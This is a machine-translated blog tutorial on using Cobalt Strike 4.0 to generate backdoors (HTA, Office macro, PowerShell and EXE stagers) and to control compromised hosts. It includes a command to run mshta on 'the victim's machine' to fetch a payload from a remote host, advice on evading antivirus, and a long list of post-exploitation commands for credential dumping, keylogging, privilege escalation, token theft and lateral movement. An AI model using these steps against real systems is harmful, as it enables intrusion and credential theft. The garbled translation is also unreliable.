当前位置:网站首页>Several ways to generate backdoor in cobalstrike 4.0 and basic operation after the host goes online

Several ways to generate backdoor in cobalstrike 4.0 and basic operation after the host goes online

2021-01-28 14:56:32 Ms08067 safety laboratory

step :Attacks—〉Packages—〉 as follows :

HTML Application Generate malicious HTA Trojan files

MS Office Macro Generate office Macro virus file

Payload Gene rator Generate versions of payload;

Windows Executable Generate executable exe Trojan horse ;

Windows Executable⑸ Generate stateless executables exe Trojan horse .

1、HTML Application

Generate malicious HTA Trojan files

— individual HTML Application (HTML application ) It's a use HTML And a Internet Browser supported scripting language Windows Program . The package generates a HTML application , The app runs a CobaltSt rikepayload. You can choose an executable option to get a HTML application , this HTML The application makes an executable file land on disk and run it .

choice PowerShell One of the options is HTML application , The app uses PowerShell To run a payload. Use VBA Option to silently derive a MicrosoftExcel Instance and run a malicious macro to payload Injection into memory .

Generate a HTML application

Attacks -> Packages -> Html Application

There are three ways to work

executable( Generate executable attack scripts )

powershell( Generate a powershell Script for )

VBA( Generate a vba Script for , Use mshta Command execution )

Here's an online approach , Generate a powershell, because i Two ways to go online are not successful , And then with host file Use .

And then it will generate one URL Copied to the

http://x.x.x.x:8008/download/file.ext

And then run it on the victim's machine

mshta http://x.x.x.x:8008/download/file.ext

then CS You can receive it online

2、MS Office Macro

The package generates a MicrosoftOffice Macro file and provide the macro embedded Microsoft Word or Microsoft Excel Explanation . This article refers to the macro file making part of my fishing part .

3、payload Generator

This package allows you to export in many different formats Cobalt Strike Of stager.

function Attacks -> packages --> payload generator

This module can generate n The back door to a language Payload, Include C,C#,Python,Java,Perl,Powershell Script ,Powershell life Make ,Ruby,Raw, No kill frame Veli Medium shellcode wait …

penetration Windows During the host process , What we use more is Powershell and Powershell Command, Mainly because of its convenience Easy to use , And you can escape the anti-virus software (AV) The investigation and killing of .

With Powe rshell Command For example , Generated payload For a string of commands , Just execute the command on the host ( The main engine needs to be installed loading Powe rshell), cs You can receive a message from the host beacon

4、Windows Executable (Windows Executable file )

The package generates a Windows Executable Ar tifact, Used to transmit a payload stage r. This package gives you a variety of output options .

Windows Serv ice EXE It's a Windows Executable file , Can respond to Service Cont rol Manage r command . You can use this executable as a tool to use sc It's the order Windows The caller of the service , Or use Metasploit Framework of the PsExec Module generates a custom executable file .

in other words , ordinary EXE And server start call EXE The difference is . utilize Windows ServiceEXE Generated EXE Can be used as a self starting service EXE, utilize Cobalt Strike in Windows exe Generated EXE It can't be used as a uniform It's self starting EXE Program ( Because I can't respond Service Control Manager)

Windows DLL (32-bit) It's a x86 Of Windows DLL.

Windows DLL (64-bit) It's a x64 Of Windows DLL. This DLL It will generate a 32 Bit process , And move your monitor to it . these two items. DLL Options will export a start function , This function and rundll32 .exe Compatible with . Use rundll32 .exe To load your DLL. Check Use x64 payload Box to generate a match x64 stager Of x64Ar tifact. Check Sign executable file Box to use a code signed certificate to sign a EXE or DLL Ar tifact. you You must specify a certificate , You must be there. C2 Specify the certificate in the extension file .

There's a lot said above, but the practice is very simple , Just make sure the victim's computer is X64 still X32 Run our generated exe file

5、Windows Executable(s)

The package is exported directly Beacon ( That is to say payload stage), This Beacon It was written by the author 32 or 64 position DLL, It's one that doesn't use stager The executable of , Connect directly to the monitor 、 Transmit data and commands . One doesn't use stager Of payload Ar tifact It's called phaseless Ar tifact. This package also has Powe rShell Option to export Beacon As a PowerShell Script , or raw Options export location independent beacon Code .

By default , This dialogue leads to x86 payload stage. Check Use x64 payload Box to use x64 Ar tifact Generate a x64 stage. Check Sign executable file Box to sign a with a code signed certificate EXE or DLL Artifact.

Here we try to generate a powershell Horse

But it's not feasible to run it directly after generation

Here's to change his strategy

Only administrators have permission to change this policy . Non administrators will report errors . View script execution policies , Can pass :

PS E:> Get-ExecutionPolicy

Change the script execution policy , Can pass

PS E:> Get-ExecutionPolicyRestrictedPS E:> Set-ExecutionPolicy UnRestricted

And then execute it again :

CS4.0 Operate after the machine is online

Right-click menu :

One 、Interact

Enter the operation command

Two 、Access

Dump Hashes # obtain hash

Elevate # Raise the right

Golden Ticket # Generate a gold note and inject it into the current session

Make token # Certificate conversion

Run Mimikatz # function Mimikatz

Spawn As # Use other users to generate Cobalt Strike The listener

3、 ... and 、Explore

Browser Pivot # Hijack the target browser process

Desktop(VNC) # Desktop interaction

File Browser # File browser

Net View # command Net View

Port Scan # Port scanning

Process List # Process list

Screenshot # Screenshot

Four 、Pivoting

SOCKS Server# Agency service

Listener # Reverse port forwarding

Deploy VPN # Deploy VPN

5、 ... and 、Spawn

External monitors ( Be assigned to MSF, obtain meterpreter jurisdiction )

6、 ... and 、Session

Note # remarks

color # Mark the color

Remove # Delete

Sleep # Specify the sleep time of the controlled end , Default 60 Every second , Let the accused end every 10 Seconds to download a task . In practice, frequency Not too fast , Easy to find .( Heartbeat time )

Exit # sign out

interact open beacon The operation to be performed after :

1. argue Process parameter spoofing

2. blockdlls Resistance ⽌⼦ Process load ⾮Microsoft DLL

3. browserpivot notes ⼊ Victim browser process

4. bypassuac Bypass UAC Increase authority

5. cancel Cancellation is in progress ⾏ The download

6. cd Switch ⽬ record

7. checkin Force the accused end to connect back ⼀ Time

8. clear eliminate beacon Internal task queue

9. connect Connect to a Beacon peer over TCP

10. covertvpn Deploy Covert VPN client

11. cp Copy ⽂ Pieces of

12. dcsync from DC Extract the password hash from

13. desktop Remote desk ⾯(VNC)

14. dllinject Reflection DLL notes ⼊ process

15. dllload send ⽤LoadLibrary take DLL Load into process

16. download download ⽂ Pieces of

17. downloads List what's going on ⾏ Of ⽂ Download

18. drives List ⽬ Mark the drive letter

19. elevate send ⽤exp

20. execute stay ⽬ Mark with ⾏ Program (⽆ Output

21. execute-assembly stay ⽬ Mark in memory ⾏ Local .NET Program

22. exit end ⽌beacon conversation

23. getprivs Enable system privileges on current token

24. getsystem Try to get SYSTEM jurisdiction

25. getuid obtain ⽤ Household ID

26. hashdump Dump password hash

27. help help

28. inject In note ⼊ process ⽣ It's a conversation

29. jobkill end ⼀ A backstage task

30. jobs List background tasks

31. kerberos_ccache_use from ccache⽂ It's a guide in the process ⼊ The bill should be ⽤ In this conversation

32. kerberos_ticket_purge Clear the ticket for the current session

33. kerberos_ticket_use Apply from ticket⽂ It's a guide in the process ⼊ The bill should be ⽤ In this conversation

34. keylogger Keyboard record

35. kill The end of the process

36. link Connect to a Beacon peer over a named pipe

37. logonpasswords send ⽤mimikatz Dump credentials and hash values

38. ls List ⽂ Pieces of

39. make_token Create a token to pass credentials

40. mimikatz shipment ⾏mimikatz

41. mkdir establish ⼀ individual ⽬ record

42. mode dns send ⽤DNS A As a communication channel ( Limited to DNS beacon)

43. mode dns-txt send ⽤DNS TXT As a communication channel ( Limited to D beacon)

44. mode dns6 send ⽤DNS AAAA As a communication channel ( Limited to DNS beacon)

45. mode http send ⽤HTTP As a communication channel

46. mv Move ⽂ Pieces of

47. net net command

48. note remarks

49. portscan Into the ⾏ End ⼝ scanning

50. powerpick adopt Unmanaged PowerShell Of board ⾏ command

51. powershell adopt powershell.exe Of board ⾏ command

52. powershell-import guide ⼊powershell Script

53. ppid Set parent PID for spawned post-ex jobs

54. ps Show process list

55. psexec Use a service to spawn a session on a host

56. psexec_psh Use PowerShell to spawn a session on a host

57. psinject In a particular process ⾏PowerShell command

58. pth send ⽤Mimikatz Into the ⾏ Pass hash

59. pwd At present ⽬ Recording position

60. reg Query the registry

61. rev2self Restore the original token

62. rm Delete ⽂ Piece or ⽂ Clip

63. rportfwd End ⼝ forward

64. run stay ⽬ Mark with ⾏ Program ( Return output )

65. runas With other ⽤ The authority of the user is ⾏ Program

66. runasadmin stay ⾼ Under the authority of ⾏ Program

67. runu Execute a program under another PID

68. screenshot Screen capture

69. setenv Set the environment variable

70. shell Of board ⾏cmd command

71. shinject take shellcode notes ⼊ process

72. shspawn start-up ⼀ A process and will shellcode notes ⼊ among

73. sleep Set sleep delay time

74. socks start-up SOCKS4 agent

75. socks stop stop ⽌SOCKS

76. spawn Spawn a session

77. spawnas Spawn a session as another user

78. spawnto Set executable to spawn processes into

79. spawnu Spawn a session under another PID

80. ssh send ⽤ssh Connect to remote host

81. ssh-key send ⽤ Key connection to remote host

82. steal_token Steal token from process

83. timestomp take ⼀ individual ⽂ The time stamp of the piece should ⽤ To another ⼀ individual ⽂ Pieces of

84. unlink Disconnect from parent Beacon

85. upload Upload ⽂ Pieces of

86. wdigest send ⽤mimikatz Turn to Chu Ming ⽂ The credentials

87. winrm send ⽤WinRM Lateral penetration

88. wmi send ⽤WMI Lateral penetration

This article is from WeChat official account. - Ms08067 Safety laboratory (Ms08067_com)

The source and reprint of the original text are detailed in the text , If there is any infringement , Please contact the yunjia_community@tencent.com Delete .

Original publication time : 2021-01-22

Participation of this paper Tencent cloud media sharing plan , You are welcome to join us , share .

版权声明
本文为[Ms08067 safety laboratory]所创,转载请带上原文链接,感谢
https://chowdera.com/2021/01/20210128144227707t.html